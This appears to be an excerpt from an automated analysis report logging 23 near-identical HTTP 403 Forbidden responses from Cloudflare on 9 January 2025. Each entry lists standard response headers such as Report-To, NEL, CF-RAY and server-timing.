Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2aj2sH81NDlC0OXC3t0E%2BKrpLRxkv%2Botw1f19y2l9NN3ilFQteti7YoWC1zaxVyToSztPSOh5EmEvH%2FlvmqkyPY2l6UtKi2SDAJmRIjAQO6zDN8Gh7453LWnfJlVIPsD8t1pXo5pdfOY1bU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4729a5f42c9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1599&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1696687&cwnd=127&unsent_bytes=0&cid=8bdb04fe3af094d3&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yb6PG8Yk6rmHcgXTt1EsC2LPx%2BISxH7s7VxkAx384Eqg%2B7jGup4cyxx8LgmW%2F19f7zGYTEu2RFz1FOwMP5aBGOOPMvBfarCZtu4nDJb4LL6N10YFbXWPdhisxpbRMfX2VCF3CVbyUK9uyoSE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4766ded4252-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2173&min_rtt=2171&rtt_var=819&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1331509&cwnd=235&unsent_bytes=0&cid=c1da6b197806df81&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:38 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8r9NyKXdJeYDeqLRuHhxJsruVly5Oxw%2BjMkKlQbqRkhS%2BEmeAH5QckydB8fEF6PGqlW5EvPMxRmFSvU1El4X4e%2BRJdQAjj147KUTaPhA4pbiN762yiSRQcHHOmFyE2ZmeI0K7ooIJU5P6%2F1A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c47a3fc7f793-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1654&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1685912&cwnd=152&unsent_bytes=0&cid=1cc3152044569207&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:39 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WRlywGzzCELNGKiYM5tJ5DkdIZTGD%2BLscBFmJ7UevRx%2Flq%2FbiO6TizurM4ODZlRi8aYj5tUChXxZmjmC6ICsBAPDohuTA%2BcLKfrHEE26EsABraP6y7Ka4yRR0Z8U57nqiisEikLqKpefNPY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c47e0b6a0f4b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1485&rtt_var=572&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1886304&cwnd=230&unsent_bytes=0&cid=18b8dfe3fa4f1965&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:39 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilfIp%2FsfuV3eZyb29%2FQWn06ahrwP%2FxmJNfCzMW2g1Ww18sMfvLlZZ4HDamWjDGLWwRX4kxV3AHEBUzJGz3yEy9zfU6LIVnrMZ%2FleWkmf%2Fi3J5ypsAGgVmcYPhbvKmoVCCX6LH%2FLFXlSTB%2Byt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c481afd73338-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1923&rtt_var=738&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1466599&cwnd=245&unsent_bytes=0&cid=9ae71277f81f1bd9&ts=125&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LCY4PJSgylVU01kDLeL9pltIijxmgkec1jkvG%2FMGLVdCrOAP8dABZfl9EK4Rp4A4Jxu0LBS7mcnWx3GodKE%2FyPaGwltiqFz6DsQ7Si3wn%2FS7HWOOivWo6oYDgQcup1aCvJVu3JC%2B%2FaHllu3l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4857947c413-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1688&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1712609&cwnd=181&unsent_bytes=0&cid=1cfabc3265e1772a&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:41 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huKT01qbxdi9p1F4%2BOJXw61ZLzJ1aPDRTvo59kf3mLEvwSE1h%2BtCyHsa99FUjCKgSpU%2F9YHHO67cWR7akpI%2BKcRaW%2FnOG9pWUthHj7I3ZwKBrMeJHk49LKJ2MkQjpFUb1YBCReo9i9vfGnpw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c48928bd728d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2015&rtt_var=783&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1373471&cwnd=234&unsent_bytes=0&cid=d771eed79bc316a3&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:41 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1Ycj9QPhaOUnoUr9j8IgGzDPmmYCPqWebidxwQV%2FqcN6jyIPemNmkJBJ3dhxXh2q4%2B2Wlt7yPr6HkYhK0Xk1DAn0eJ7%2Bu7ru8Dw5cIB7cFpOwWNPbt4smjGbtL1Nz17NDFS6ELxdrIpWf6A"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c48cee598c8f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1933&rtt_var=742&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1459270&cwnd=209&unsent_bytes=0&cid=47374d9cf08a3412&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fr1b5QfqhherwRnOeuLM%2FupBLAZXH1FDiWE60mTQrg6OjdspLlpzt94GIORUY38dTRiYK%2F29xlfxBRPzNlQE0w04bzEUA4HTC%2BNEEZ%2BAl4WDolfAcCdOgg30n7uAxVEIBSpKOvQFBF378lRd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4908a594251-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1626&rtt_var=621&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1746411&cwnd=248&unsent_bytes=0&cid=1e6569b620e73566&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkY73WQFxRh9TaXR9fztIkcxewmpVv%2BgVEPpcD%2B2rLdatOX0pLseIsGU4VF4TkVNKDmA8sLFUZK9XixXKiwZk%2F5rDS6uPYA7jUSAg4i0Hb%2B3w5YMpUCmbjI973AQVFC%2FxjkuPQpazXjefj13"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4946aed438c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1592&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1800246&cwnd=245&unsent_bytes=0&cid=8f9dd558294823b7&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:43 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bL3j2LUlO3vuZXjJjkfx7b4Q7yz9NmZWw9MNsNhXm40BKsHzdo4134ogyZ12FhcQOyFqUi2QrsjOX2inOGdMihgAfymtWBSz1TPR7Vq2pg%2BANFnecQyZahXhg4MaKeK6Zs14hVkFZC1XuHah"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4985da00c94-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1539&rtt_var=580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1883870&cwnd=146&unsent_bytes=0&cid=49550e8f98031921&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:44 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yB8%2FWYfnv0B5sP6KoJsRqGihGX5NUqDbSAEAIrDczKm0bjFh78B01OfIzEP%2BSIoDR6f%2BX5axAqTHM9yVGWoJHaFzE%2Fai%2FsR6PxS2iXr9tWd176W57XnyH7iTNFTdvt5YvirvdYTCgzfL8YN5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c49c28734265-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1683&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1671436&cwnd=206&unsent_bytes=0&cid=7206ec0167d7df1b&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:44 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHwa0ZDDUmRbhRY1Iqi7CEuN0NzAoMzl1zHa6GV4fVwE4yG7JrDmNZQmTDuvDX%2FTIIxmbPH9EIeFfAhLiQOPJ5MrK4WXqzopU%2BSJz9fwtDu7nJf6YSUgU0p16flBU%2BQPOyOKYxh%2B4WXVgHpB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c49ffe41727a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1975&rtt_var=759&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1478481&cwnd=224&unsent_bytes=0&cid=cf243a5c281037ec&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJT6rJ2JypP42p6uIf40y%2FexYlJnYnalz7w6OsafB6PLk04pu7BXe%2FWbRdclrMelFrCEu75POLUScqexK5SKjK3qwNTfpuCxWbvB9xPhwWZbBg04rE6dgDQDNzBNoIuH%2F4SytAhEkRCbVWno"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4a3fee319aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1969&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1429970&cwnd=32&unsent_bytes=0&cid=bf1795c18b9e4225&ts=171&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C8r6kyYgJR5XiUe1hGm89CWWZXY9yVh6CG3P6YC8NZ4uEgQY1tKc3BmG2PYHW3Ma%2FH8gXKlYymKzfYVPgBJMfaoXlp6dSDrGRXLs6Bs3ojxKTfQP%2FceKTWBz1qc8aU%2BWuhwbegJ7Vr0AAnK%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4a7ab4132fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2072&rtt_var=792&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1409266&cwnd=164&unsent_bytes=0&cid=74301a27a44a3abb&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hc9IgXV%2BoeUmSggBM4%2Bi5tFgdy6MR9ykZyuwIIiEtAYEcpqN%2F0RLoPW7zvcTDCJS8dr5XWiu59pHOEQlqV1zkqp5Su8er6ubZM9NMmxxugMCLNk4Ka3a77Ra96PMFgJ%2BoFMHdaKwnvm8zOy8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4ab7abb41c0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1704&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1633109&cwnd=210&unsent_bytes=0&cid=13f54f0ab20b1563&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZWmJohkA8nDW38rdSqFC%2FI9qb1FSHwNjXDpttLkVvbWcio6bhMrYnlyjJNdsRwks67B%2BmaQzOh4UNF2v4dZ%2BByQR%2BRPP75j2yPTCauHmJ3IvLMbQvSThGWNVJnDT0xpTfGSeuXl4LewZXCY0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4af48577c8d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2019&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1425781&cwnd=185&unsent_bytes=0&cid=7ffee8acaffbf260&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TONUrs7vrVxg0YWdH%2B4t2VeQbASs0j2bzj8WS%2B1bgqpPQUiZzF4TWZFJsWA8ovoTalGZeFENziSk%2FBy08Zd7zLpVHTnFHmSrkJmyfBRTs4XFvfoWrX%2F1MQ7aIXb0WNHrSm8Goh71hNIdljxW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4b2ff5a436c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1584&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1749550&cwnd=228&unsent_bytes=0&cid=8eea45b5024e76ca&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:48 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Vw0DFnfWlSLB39b4pu66kiJZJCEU3sJsPuOl5RMAou7%2FMpgyiBKYjY5LYHMBjnnb1BR5O0u1ezb8oEJZxrmzCJPR6WvugaWq13u8T8uLYrrX7ELwfPAVOEHnRVNuORP6wW2Z66ZPAgNUNVV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4b6cecf4349-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1649&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1770770&cwnd=227&unsent_bytes=0&cid=5f7d7c5448cc6098&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hnpDCDhVjCMHUnzkeA3opkcyRDWN3wI6EwlrL2pjcnr62NcayOboN4HW2MuUi8db%2BZC%2FYfasJDKPjuT1H9t%2F0uZbWb6pGuQHkkxbo%2Bkivjmpxr2vVUBFtqQYaJJSsAJlXW4NSIKKou%2BURLQa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4bb2b317c7e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1905&min_rtt=1900&rtt_var=722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1505154&cwnd=228&unsent_bytes=0&cid=b76fbdfcc8f81399&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0D3%2FUph5i6ZNt8De3DBwg5tWDzyWV%2BME3xyvpV95yFrYXMTq5CV3vg477Eofl7PbxCoLVurTzhS92AYLi9QQoJwj2e8lxwN5rkWQY0lImqQFszriduupnIyBOO7dmSUhA4U%2FYkPUQFAuzmZc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4bee812c436-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1615&rtt_var=725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1808049&cwnd=223&unsent_bytes=0&cid=2404eb343de523dc&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8HNJa%2BVwRV1bdgLmL2P1jsuaHJJOVgbEsLH9nHT0n2PyZ4Yn8ZNY2zTNSMnm8ULm5gJEXUtyJk4WVSyM1Z79d00QphA3jh5d3hDdEWfUXPwLWM6BhHQ%2FQt3WxsHNADjTQgXesVuG1ddAGsy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4c28d50428f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1668&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1680092&cwnd=100&unsent_bytes=0&cid=b2899ad9cc3a6efe&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGbq%2FQ3BULZ5JJPxVVGyH8xutzEl7N0HYKAlNve1g4Tzxo8Gt7detcuSrK8bJ%2FDHlhPQIKX7kcs78PZWGSVEvYbkkIB55ExQrkNJdi4Bzwru49oUjYQEAlfhffiozPgyrRLCWGwyQvhUBfPx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4c65a7f0ca6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1462&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1907250&cwnd=221&unsent_bytes=0&cid=4d6d9c214cf4d1a9&ts=147&x=0"
